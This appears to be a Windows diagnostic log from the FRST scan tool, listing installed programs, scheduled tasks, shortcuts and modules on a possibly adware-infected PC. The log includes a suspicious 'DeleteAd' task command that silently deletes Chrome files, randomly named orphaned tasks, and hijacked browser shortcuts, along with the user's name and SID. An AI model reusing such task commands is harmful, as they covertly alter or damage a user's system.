Microsoft Visual Studio Ultimate 2013 with Update 3 (HKLM\...\{71688083-99e8-4e10-9522-8e98a130c438}) (Version: 12.0.30723 - Microsoft Corporation)
Microsoft Web Deploy 3.5 (HKLM\...\{D58573E7-F82D-41E4-B10B-3041202A51D2}) (Version: 3.1237.1763 - Microsoft Corporation)
Microsoft Windows SDK for Visual Studio 2008 Express Tools for .NET Framework (HKLM\...\{B4C0A315-07FB-39F9-85CD-8CE20C019350}) (Version: 3.5.21022 - Microsoft)
Microsoft Windows SDK for Visual Studio 2008 Express Tools for Win32 (HKLM\...\{07FCBED5-94C3-4F94-B9D3-360FA27C7B06}) (Version: 6.1.5288.17011 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
Microsoft XNA Framework Redistributable 3.1 (HKLM\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft (HKLM\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mobizen (HKLM\...\{BA0D3A44-BCEE-4C8B-BCD4-F7F1E64F41E3}) (Version: 2.16.0.1 - RSUPPORT)
Movie Maker (Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Mozilla Firefox 49.0.1 (x86 en-GB) (HKLM\...\Mozilla Firefox 49.0.1 (x86 en-GB)) (Version: 49.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 49.0.1.6109 - Mozilla)
MSBuild/NuGet Integration 14.0 (x86) (Version: 14.0.25123 - Microsoft Corporation) Hidden
Multi-Device Hybrid Apps using C# - Templates - ENU (Version: 14.0.23107 - Microsoft Corporation) Hidden
NCsoft Launcher (HKLM\...\{5F8E2CBB-949D-4175-AC98-5ADE7F6C9697}) (Version: 1.5.25.1 - NCsoft)
Nexon Game Manager (HKLM\...\{EA2DB6E0-72C5-4ef9-A3A0-E6705F4A6A9E}) (Version: - )
No-IP DUC (HKLM\...\NoIPDUC) (Version: 4.1.0 - Vitalwerks Internet Solutions LLC)
Notepad++ (HKLM\...\Notepad++) (Version: 6.9.2 - Notepad++ Team)
NVIDIA PhysX (HKLM\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
Open Broadcaster Software (HKLM\...\Open Broadcaster Software) (Version: - )
Open XML SDK 2.5 for Microsoft Office (Version: 2.5.5631 - Microsoft Corporation) Hidden
OpenAL (HKLM\...\OpenAL) (Version: - )
OpenTTD Package 0.7.5 (HKLM\...\OpenTTD Package) (Version: 0.7.5 - OpenTTD.org / Package: NHLfan (www.free-clan.org))
Origin (HKLM\...\Origin) (Version: 10.1.1.35466 - Electronic Arts, Inc.)
Overwolf (HKLM\...\Overwolf) (Version: 0.97.209.0 - Overwolf Ltd.)
Paladins (HKLM\...\Steam App 444090) (Version: - Hi-Rez Studios)
PCSX2 - Playstation 2 Emulator (HKLM\...\pcsx2-r5875) (Version: - )
PDF Settings CS4 (Version: 9.0 - Adobe Systems Incorporated) Hidden
Photoshop Camera Raw (Version: 5.0 - Adobe Systems Incorporated) Hidden
Pixel Bender Toolkit (Version: 1.0 - Adobe Systems Incorporated) Hidden
Pixelmon Launcher (HKLM\...\Pixelmon Launcher 1.1.31) (Version: 1.1.31 - Ikara Software Limited)
Pixelmon Launcher (Version: 1.1.31 - Ikara Software Limited) Hidden
PlanetSide 2 (HKLM\...\Steam App 218230) (Version: - Sony Online Entertainment)
PlanetSide 2 (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\SOE-PlanetSide 2 PSG) (Version: 1.0.3.183 - Sony Online Entertainment)
Pokémon Trading Card Game Online (HKLM\...\{E4F8D5D6-87DC-41CD-8FE1-09190034259F}) (Version: 2.27.0 - The Pokémon Company International)
Port Forward Network Utilities (HKLM\...\{88B1D36C-7B70-4C48-8D2F-AAB956ECF4C3}) (Version: 2.0.7 - Portforward, LLC)
PreEmptive Analytics Visual Studio Components (Version: 1.2.3197.1 - PreEmptive Solutions) Hidden
PreEmptive Analytics Visual Studio Components (Version: 1.2.5134.1 - PreEmptive Solutions) Hidden
Prerequisites for SSDT (HKLM\...\{35C1D9D6-87C0-46A3-B1B4-EDBCC063221C}) (Version: 11.1.3000.0 - Microsoft Corporation)
Project 64 version 2.1.0.1 (HKLM\...\Project 64_is1) (Version: 2.1.0.1 - )
Project64 1.6 (HKLM\...\{9559F7CA-5E34-4237-A2D9-D856464AD727}) (Version: 1.6 - Project64)
Python Tools Redirection Template (Version: 1.2 - Microsoft Corporation) Hidden
QuickSFV (HKLM\...\{DBDCD3AF-20E4-4E5E-80E8-B14109FE5DD9}) (Version: 3.0.0 - Totally Useful Software, Inc.)
Rayman Origins (HKLM\...\Uplay Install 80) (Version: - Ubisoft)
Rayman Raving Rabbids (HKLM\...\{111E336D-30BF-4CD4-8D69-4541732AFB27}) (Version: 1.00.0000 - Ubisoft)
Razer Cortex (HKLM\...\Razer Cortex_is1) (Version: 6.2.12.0 - Razer Inc.)
Realm of the Mad God (HKLM\...\Steam App 200210) (Version: - Wild Shadow Studios)
RealNetworks - Microsoft Visual C++ 2008 Runtime (Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealUpgrade 1.1 (Version: 1.1.0 - RealNetworks, Inc.) Hidden
Robocraft version 0.3.290 (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\{9F101691-69D3-422E-BB5C-8CAD7110781B}_is1) (Version: 0.3.290 - Freejam)
Roslyn Language Services - x86 (Version: 14.0.23107 - Microsoft Corporation) Hidden
Roslyn Language Services - x86 (Version: 14.0.25130 - Microsoft Corporation) Hidden
RPG Maker MV (HKLM\...\RPGMV_is1) (Version: 1.0.0.0 - KADOKAWA)
RPG MAKER VX Ace RTP (HKLM\...\RPGVXAce_RTP_is1) (Version: 1.00 - Enterbrain)
Sandlot Games Client Services (HKLM\...\Sandlot Games Client Services_is1) (Version: - Sandlot Games)
Screen Capturer (HKLM\...\Screen Capturer) (Version: 1.0.4.42 - ScreenCapturer.com)
SDK de comprobación de Visual Studio 2012 - esn (Version: 12.0.30501 - Microsoft Corporation) Hidden
ShadowExplorer 0.9 (HKLM\...\ShadowExplorer_is1) (Version: 0.9.462.0 - ShadowExplorer.com)
SharePoint Client Components (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
SharePoint Client Components (Version: 16.0.2617.1200 - Microsoft Corporation) Hidden
Sid Meier's Civilization 5 (HKLM\...\Sid Meier's Civilization 5_R.G. Mechanics_is1) (Version: - R.G. Mechanics, Panky)
Simple Port Forwarding (HKLM\...\Simple Port Forwarding) (Version: 3.7.0 - PcWinTech.com)
Skype Click to Call (HKLM\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.3.0.9150 - Microsoft Corporation)
Skype™ 7.26 (HKLM\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.26.101 - Skype Technologies S.A.)
SlimDX Runtime .NET 2.0 (January 2012) (HKLM\...\{014A2868-BE56-4888-A16C-693989B8F153}) (Version: 2.0.13.43 - SlimDX Group)
Smooth Operators - Indie Gala Edition (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\6b0b0d2561055daf) (Version: 1.0.0.14 - Heydeck Games)
Sonic Foundry Vegas 4.0d (HKLM\...\{E254F7FF-1C85-47E1-96DB-1D9400C9F52A}) (Version: 4.0.205 - Sonic Foundry)
Sony Sound Forge 7.0 (HKLM\...\{0712667C-A171-49AE-A098-4ACDA28625F8}) (Version: 7.0.214 - Sony)
Spacewar (HKLM\...\Steam App 480) (Version: - Valve)
SpongeBob SquarePants - The Movie (HKLM\...\{B98D958E-9E59-43B7-B47F-043D45D73EE6}) (Version: 1.0 - )
SPORE™ (HKLM\...\{9DF0196F-B6B8-4C3A-8790-DE42AA530101}) (Version: 1.00.0000 - Electronic Arts)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Stellaris version 1.0.0 (HKLM\...\Stellaris_is1) (Version: 1.0.0 - RezMar)
Stronghold Kingdoms (HKLM\...\Steam App 47410) (Version: - FireFly Studios)
Suite Shared Configuration CS4 (Version: 1.0 - Adobe Systems Incorporated) Hidden
SumatraPDF (HKLM\...\SumatraPDF) (Version: 2.1.1 - Krzysztof Kowalczyk)
swMSM (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
System Requirements Lab (HKLM\...\{A92D0DBB-834A-4CAD-A434-F2232C692516}) (Version: 6.1.4.0 - Husdawg, LLC)
System Requirements Lab Detection (HKLM\...\{D70E0C9A-2E2A-4022-93FD-7CE96E320658}) (Version: 6.1.6.0 - Husdawg, LLC)
Team Explorer for Microsoft Visual Studio 2013 (Version: 12.0.21005 - Microsoft Corporation) Hidden
Team Explorer for Microsoft Visual Studio 2015 Update 2 (Version: 14.95.25118 - Microsoft) Hidden
Team Fortress 2 (HKLM\...\Steam App 440) (Version: - Valve)
TeamViewer 11 (HKLM\...\TeamViewer) (Version: 11.0.53254 - TeamViewer)
Telenor Internet (HKLM\...\Telenor Internet) (Version: 21.005.15.02.208 - Huawei Technologies Co.,Ltd)
Test Tools for Microsoft Visual Studio 2015 (Version: 14.0.23107 - Microsoft Corporation) Hidden
The Hardy Boys - The Hidden Theft (HKLM\...\{DECE873A-A14E-4EE1-9E28-5171B44DE80D}) (Version: 1.00.0000 - JoWooD)
The Sims 4 (HKLM\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.0.797.20 - Electronic Arts)
The Sims™ 3 (HKLM\...\{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}) (Version: 1.50.56 - Electronic Arts)
Thea - The Awakening (HKLM\...\1452699415_is1) (Version: 2.12.0.14 - GOG.com)
Trend Micro™ Titanium™ Internet Security (Version: 3.00 - Trend Micro Inc.) Hidden
TSR Workshop (HKLM\...\{CE4D2306-E8FF-4094-861B-D43DFCCC537C}) (Version: 2.0.195 - The Sims Resource)
TuneUp Utilities 2013 (Version: 13.0.3000.138 - TuneUp Software) Hidden
TuneUp Utilities Language Pack (en-US) (Version: 13.0.3000.138 - TuneUp Software) Hidden
TunnelBear (HKLM\...\{90e7dc26-e7df-406b-af23-61df6728a9f6}) (Version: 2.3.25.0 - TunnelBear)
TunnelBear (Version: 2.3.25.0 - TunnelBear) Hidden
TypeScript Power Tool (Version: 1.0.3.1 - Microsoft Corporation) Hidden
TypeScript Power Tool (Version: 1.8.9.0 - Microsoft Corporation) Hidden
TypeScript Tools for Microsoft Visual Studio 2013 (Version: 1.0.3.1 - Microsoft Corporation) Hidden
TypeScript Tools for Microsoft Visual Studio 2015 (Version: 1.8.31.0 - Microsoft Corporation) Hidden
Ubisoft Game Launcher (HKLM\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
UltraISO Premium V9.52 (HKLM\...\UltraISO_is1) (Version: - )
UnHackMe 7.80 (HKLM\...\UnHackMe_is1) (Version: - Greatis Software, LLC.)
Unity (32-bit) (HKLM\...\Unity (32-bit)) (Version: 5.4.2f1 - Unity Technologies ApS)
Unity Web Player (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\UnityWebPlayer) (Version: 5.3.6f1 - Unity Technologies ApS)
Update for (KB2504637) (HKLM\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Uplay (HKLM\...\Uplay) (Version: 22.2 - Ubisoft)
VC Runtimes MSI (Version: 9.0.21022 - Microsoft) Hidden
Visual Studio 2013 Update 3 (KB2829760) (HKLM\...\{86438e3d-7f83-4dd2-94aa-047e7c3974cb}) (Version: 12.0.30723 - Microsoft Corporation)
Visual Studio 2015 Update 2 (KB3022398) (HKLM\...\{78c1b501-a6eb-4f29-88c5-84189564827e}) (Version: 14.0.25123 - Microsoft Corporation)
VS Update core components (Version: 12.0.30723 - Microsoft Corporation) Hidden
VS Update core components (Version: 14.0.25123 - Microsoft Corporation) Hidden
vs_update2notification (Version: 14.0.25130 - Microsoft Corporation) Hidden
WCF Data Services 5.6.0 Runtime (Version: 5.6.61587.0 - Microsoft Corporation) Hidden
WCF Data Services 5.6.4 Runtime (Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2013 (Version: 5.6.61587.0 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2015 (Version: 5.6.62175.4 - Microsoft Corporation) Hidden
Winamp (HKLM\...\Winamp) (Version: 5.63 - Nullsoft, Inc)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 16.4.3503.0728 - Microsoft Corporation)
WinRAR 5.00 beta 4 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.4 - win.rar GmbH)
Workflow Manager Client 1.0 (Version: 2.0.40131.0 - Microsoft Corporation) Hidden
Workflow Manager Tools 1.0 for Visual Studio (Version: 2.0.40326.0 - Microsoft Corporation) Hidden
Worms Reloaded (HKLM\...\Steam App 22600) (Version: - Team17 Digital Ltd)
Worms Ultimate Mayhem (HKLM\...\Steam App 70600) (Version: - Team17 Software Ltd.)
XSplit Broadcaster (HKLM\...\{7BC30FB1-9AA6-4B0C-8E5A-574EA5B6CB2F}) (Version: 2.3.1505.0542 - SplitmediaLabs)
YGOPro Salvation Server Launcher (HKLM\...\{8C20F941-E756-4F78-ABC5-FE001F92716E}) (Version: 4.0.1 - Salvation Development)
Пакет Visual Studio 2012 Verification SDK - rus (Version: 12.0.30501 - Microsoft Corporation) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3268508096-794200350-1188608446-1000_Classes\CLSID\{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}\InprocServer32 -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll ()
CustomCLSID: HKU\S-1-5-21-3268508096-794200350-1188608446-1000_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\violeta\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (Unity Technologies ApS)
CustomCLSID: HKU\S-1-5-21-3268508096-794200350-1188608446-1000_Classes\CLSID\{b226c901-b163-53c9-a14c-5b55ebb03907}\InprocServer32 -> C:\ProgramData\HappyCloud\Application\npHappyCloudPlugin.dll (The Happy Cloud)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {01835097-7B05-4094-B39B-A6F6BF09B715} - \AdobeFlashPlayerUpdate 2 -> No File <==== ATTENTION
Task: {05117A57-15BB-4310-AB94-ABEB78135006} - \{CFFDB85C-56BE-4D73-B744-97DB7D610B8E} -> No File <==== ATTENTION
Task: {0906990C-C047-4C7D-8D22-5255F1024FB3} - \{1E9494FA-6CA3-400B-B661-31837511C7EE} -> No File <==== ATTENTION
Task: {12E6E6BA-1D5A-41E4-A511-53A2E46B0B1E} - System32\Tasks\{5C207EF9-CA08-43D4-91CA-6C590E7657FE} => pcalua.exe -a C:\ProgramData\DeleteAd\DeleteAd.exe -c /progname=DeleteAd /progver=3.4.2 /progpub=DeleteAd /proguninstallurl=asdahjka.com /deleteappfolder=0 /deletefile2="C:\Program Files\Google\Chrome\Applicationupdate.dll" /deletefile3="C:\Program Files\Google\Chrome\Applicationchrome.dll" /VERYSILENT
Task: {1C7306D1-9834-4D43-A2C5-FEFAE0216B5D} - \{3E27A315-206F-40D5-88C8-C29D09D3BAEB} -> No File <==== ATTENTION
Task: {1E231D30-8087-4CA8-A2E0-4991D889B0B7} - System32\Tasks\{311AF327-B021-4024-948B-E4C0A9BE3ED5} => pcalua.exe -a "C:\Users\violeta\Desktop\starcarft\starcraft (1)\SETUP.EXE" -d "C:\Users\violeta\Desktop\starcarft\starcraft (1)"
Task: {258FDF9B-E6BF-4C1D-85FE-93C16438F4BE} - \RealPlayerRealUpgradeScheduledTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
Task: {334E8B80-9763-434E-8437-770A5DC4A520} - \20sve2tm -> No File <==== ATTENTION
Task: {39B9DF0B-CC67-48F1-A4C1-2BADF10A3AC3} - \{33C192B0-0851-4C18-BB29-6CDD784756BE} -> No File <==== ATTENTION
Task: {3EB34F2D-8179-40B2-987A-C020312F5662} - System32\Tasks\{8E9137FE-8684-4D49-9056-080A156320CF} => pcalua.exe -a F:\setup.exe -d F:\
Task: {4D36E943-5B4B-417D-866E-E3F85BD73E06} - \TuneUpUtilities_Task_BkGndMaintenance2013 -> No File <==== ATTENTION
Task: {4E51ADA1-FD27-4C6B-942D-6D9876DAF0E8} - System32\Tasks\{7858AE6F-2D35-465B-A63B-4506E525E895} => pcalua.exe -a C:\Users\violeta\Desktop\Terramining_Launcher_v5.0.exe -d C:\Users\violeta\Desktop
Task: {4E8A2AB5-82D2-4748-9188-0E52B2B4F655} - \RsDelayLauncher_{8A34248E-7D35-4832-8378-7659E0B0A380} -> No File <==== ATTENTION
Task: {4F4C7C4A-4737-4F99-AF72-85BE3C1F13A4} - \{F0E4F20A-26C0-4803-85F3-DE100A506A22} -> No File <==== ATTENTION
Task: {554B3DC5-F1D5-4865-99F3-D4C4EB99F1CF} - System32\Tasks\{D4AE419A-9B8B-450D-AE59-1C8CC97DE39E} => pcalua.exe -a "C:\Users\violeta\Desktop\CS 1.6\CS 1.6.exe" -d "C:\Users\violeta\Desktop\CS 1.6"
Task: {5E4FD528-665B-4BC7-92C3-FC3316142788} - \{CF0DA0CD-2FF5-454E-A86C-8C36A48353BC} -> No File <==== ATTENTION
Task: {681961EB-98DB-4520-A892-699E4B818385} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-04-01] (Google Inc.)
Task: {694BC2C8-C491-43DE-BBE5-75891AEE91CB} - \{0EC195FB-14E3-4A02-B5E5-AAFFE238361D} -> No File <==== ATTENTION
Task: {7142AD74-C29A-4BB5-A27D-91D0FBBB51B6} - System32\Tasks\{A38E8D68-7584-4A0F-940E-1FE37F379412} => pcalua.exe -a "C:\Users\violeta\Documents\Adobe CS4\Microsoft Office 2007 SP2\setup.exe" -d "C:\Users\violeta\Documents\Adobe CS4\Microsoft Office 2007 SP2"
Task: {72ACF684-33A4-45E8-ACB2-EAF73F1A890E} - \{7BF7CA1C-3C80-4A51-B3A7-61A431253F64} -> No File <==== ATTENTION
Task: {74889F7C-185A-465F-8C1C-567D2DCC89F3} - \pimofki -> No File <==== ATTENTION
Task: {7A50F39A-32C9-40E7-886D-6342E45BB001} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-04-01] (Google Inc.)
Task: {7BD59BB0-7AB6-4C3F-86F5-EA01AB5F3279} - \fuwykpyf -> No File <==== ATTENTION
Task: {8166E3F4-7EC4-491B-A85A-46583DA99AFF} - System32\Tasks\{BFB9C547-7098-46A8-8E8F-9910DA232F47} => pcalua.exe -a E:\setup.exe -d E:\
Task: {832ED96F-EC20-4772-BA80-943E8A40FCEE} - System32\Tasks\Overwolf Updater Task => C:\Program Files\Overwolf\OverwolfUpdater.exe [2016-08-29] (Overwolf LTD)
Task: {83E5CED8-349E-4DE8-9520-04CAF5F20EEC} - System32\Tasks\{B09A2006-EB16-4965-88E7-1DEBF6F20697} => pcalua.exe -a D:\Setup.exe -d D:\
Task: {92FDFE4C-B839-4B9D-901E-E6033735687A} - System32\Tasks\{2E2E9404-8E8E-461C-BE14-AA355E9F486D} => C:\Program Files\Steam\Steam.exe [2016-10-13] (Valve Corporation)
Task: {949BC973-1ECE-428A-AA5E-41334017F8FD} - System32\Tasks\{C457118D-ABD5-4247-AAC2-C7F544A687A7} => pcalua.exe -a "C:\Users\violeta\Documents\Microsoft Office 2007 SP2\setup.exe" -d "C:\Users\violeta\Documents\Microsoft Office 2007 SP2"
Task: {9810F01D-F471-42A3-B856-C40FC59F9803} - \{8F1539C2-BC2A-4974-A0CC-92330EC7F6BF} -> No File <==== ATTENTION
Task: {9CBF7DD8-1CE8-4DCB-B923-DAF4E4701D7D} - \{6DE94743-B83B-4B6B-90D4-3221A25A338C} -> No File <==== ATTENTION
Task: {9F201C7A-576B-4D43-8D9F-A4B54293FCEF} - \{C5939251-AF8C-4222-AEE8-017F4EFC29BA} -> No File <==== ATTENTION
Task: {A39DDC62-CEEC-413F-BC16-C10C4D0E1286} - System32\Tasks\{59A7E9A3-F72E-4FDC-A8D6-02402773F974} => pcalua.exe -a "C:\Program Files\InstallShield Installation Information\{9DF0196F-B6B8-4C3A-8790-DE42AA530101}\SPORESetup.exe" -c -runfromtemp -l0x0009 -removeonly
Task: {A3EF7403-3EB3-4A5E-85B2-F1842BAF02CF} - System32\Tasks\{95502C7E-0E78-4F3A-BEC0-EDBFC19B41E9} => C:\Program Files\Codemasters\Worms 4 Mayhem\launcher.exe
Task: {A6EFF130-5382-4A63-A033-86FA1924A0FC} - System32\Tasks\{B262C212-FA9B-45C9-9574-A28A5B808AE3} => pcalua.exe -a C:\Users\violeta\AppData\Local\Temp\Shockwave_Installer_FF.exe -d "C:\Program Files\Mozilla Firefox" <==== ATTENTION
Task: {A91BEF5F-C911-48EB-8D41-FF9292D84650} - System32\Tasks\{F35EF9E7-3F1A-4BDE-97E4-74DD73E6BB2D} => pcalua.exe -a E:\Sims3Setup.exe -d E:\
Task: {AF04095F-DCCD-4778-8E44-F5EBFFD2B929} - \{F7D851AA-0D16-4E69-A250-0BBEFB60741F} -> No File <==== ATTENTION
Task: {B1200175-6D83-4B23-AC80-4688B50DFC6C} - System32\Tasks\Opera scheduled Autoupdate 1374300909 => C:\Program Files\Opera\launcher.exe
Task: {B392518B-C4FB-46AB-97B9-C782DF67F093} - \{F05E8383-6A0D-4EC7-8387-45219DAF74DC} -> No File <==== ATTENTION
Task: {B4849F2D-8897-4812-B999-D27BD4E24928} - \{0124643C-E010-44C2-9F26-76F3A357FEEC} -> No File <==== ATTENTION
Task: {B97BA05A-0C28-43A4-BEB8-4215C63E9B74} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-04-15] (Piriform Ltd)
Task: {C04DD09C-8E8F-4EFC-BA40-76E38C017EDF} - \{83496550-34D8-473D-9C5B-22447F85749B} -> No File <==== ATTENTION
Task: {C0E03518-0BD3-4FB9-BC6A-CEFB4366A54A} - System32\Tasks\{18CB3208-4D4D-42BB-BC6A-C70FF9FB57D7} => C:\Program Files\Steam\Steam.exe [2016-10-13] (Valve Corporation)
Task: {C47C9F45-028F-489C-8034-E39D23DEF266} - System32\Tasks\{04502F1C-86D9-4EA2-9C23-9BC3171C1BDD} => pcalua.exe -a C:\Users\violeta\Downloads\qsfv236.exe -d C:\Users\violeta\Downloads
Task: {C92C0B60-5D18-4764-96A6-F34DE2E15136} - \AdobeFlashPlayerUpdate -> No File <==== ATTENTION
Task: {D0EEEA40-7CEF-4D6D-A553-DE1D49CBB4B8} - \RealDownloaderDownloaderScheduledTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
Task: {D97EE862-AE54-469B-BEE3-B49B10A1B715} - \{FCDC0ED4-0446-4695-8787-4841D69B92BC} -> No File <==== ATTENTION
Task: {DE7F472F-7147-4F3C-9A59-01F3BCF2BC5A} - System32\Tasks\Norton Security Scan for violeta => C:\PROGRA~1\NORTON~2\Engine\403~1.27\Nss.exe
Task: {E7ACA675-7025-4907-B741-CDA24CF6A000} - \{56AC13DC-CA7D-4BD2-B12C-8D196A5BA630} -> No File <==== ATTENTION
Task: {E9004173-DBF4-4037-95A5-4F3CEE5A74D8} - System32\Tasks\Microsoft\VisualStudio\VSIX Auto Update 14 => C:\Program Files\Microsoft Visual Studio 14.0\Common7\IDE\VSIXAutoUpdate.exe [2016-03-22] (Microsoft Corporation)
Task: {EDD3D664-5750-4AA8-A4A7-35D0AFA7F94B} - System32\Tasks\{A0C6A56F-E9DC-482E-B09F-7F8A4DD9123E} => pcalua.exe -a "H:\Microsoft Office 2007 SP2\setup.exe" -d "H:\Microsoft Office 2007 SP2"
Task: {EE29AE84-B65C-4094-A9DC-5619657B01F6} - System32\Tasks\{518DEA76-1413-4EAC-8A7E-EB8239A2CC26} => pcalua.exe -a C:\Users\violeta\Desktop\monaco\MonacoX_V101.exe -d C:\Users\violeta\Desktop\monaco
Task: {F170349C-A3EE-4B1E-B817-A0EB7254A9AA} - \RealPlayerRealUpgradeLogonTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
Task: {F19D654B-7102-4AE6-A028-F1AA9A3DDD04} - System32\Tasks\{9501D8D4-7EA9-414E-9D63-51680C081EE2} => pcalua.exe -a C:\Windows\system32\PhysX.cpl
Task: {F39B86DA-11E0-462A-A409-27C135FB15F3} - System32\Tasks\{DE527422-51DA-4DDC-80B5-E26334C302C0} => pcalua.exe -a C:\Users\violeta\Downloads\ioquake3-q3a-1.32-1.x86.exe -d C:\Users\violeta\Downloads
Task: {F65802D2-02AC-45BA-8526-47BAA75872AB} - System32\Tasks\{27F1F02B-D602-4D33-9DC7-B44328FC20A0} => pcalua.exe -a "C:\Windows\Garrysmod - NOSTEAM - FuzeRip\uninstall.exe" -c "/U:C:\Program Files\GarrysMod\Uninstall\uninstall.xml"
Task: {F6DF3C1F-22F2-40DB-AA94-2B7F42C715F2} - System32\Tasks\{16675950-E014-4F0D-8D6B-180D571145FB} => pcalua.exe -a C:\Users\violeta\Desktop\Starcraft\Chaoslauncher.exe -d C:\Users\violeta\Desktop\Starcraft
Task: {FE5C0531-D94E-4827-9879-2EF8A4CF5047} - System32\Tasks\UnHackMe Task Scheduler => C:\Program Files\UnHackMe\hackmon.exe [2015-10-07] (Greatis Software)
Task: {FEF60921-2E0B-4B6F-8182-269FBE4F1E36} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2016-09-14] (Adobe Systems Incorporated)
Task: {FF8DA4BE-015F-43F0-92CE-F0CD9BF820F0} - \{74CF8BF1-6DC8-411D-BEAF-22DAA4FEDFAF} -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Norton Security Scan for violeta.job => C:\PROGRA~1\NORTON~2\Engine\403~1.27\Nss.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Покретач Chrome апликација.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (No File) <===== Cyrillic
Shortcut: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Simple Port Forwarding\SPF - Basic UI Mode.lnk -> C:\Program Files\Simple Port Forwarding\basic_ui.bat ()
Shortcut: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Покретач Chrome апликација.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (No File) <===== Cyrillic
Shortcut: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GarrysMod\Start Garrysmod.lnk -> C:\Program Files\GarrysMod\Start.bat (No File)

ShortcutWithArgument: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\violeta\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\violeta\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%

==================== Loaded Modules (Whitelisted) ==============

2016-07-06 17:24 - 2012-08-31 15:01 - 00151552 _____ () C:\Windows\System32\HP1100LM.DLL
2016-07-06 17:26 - 2012-08-31 15:01 - 00069632 _____ () C:\Windows\system32\spool\PRTPROCS\W32X86\HP1100PP.DLL
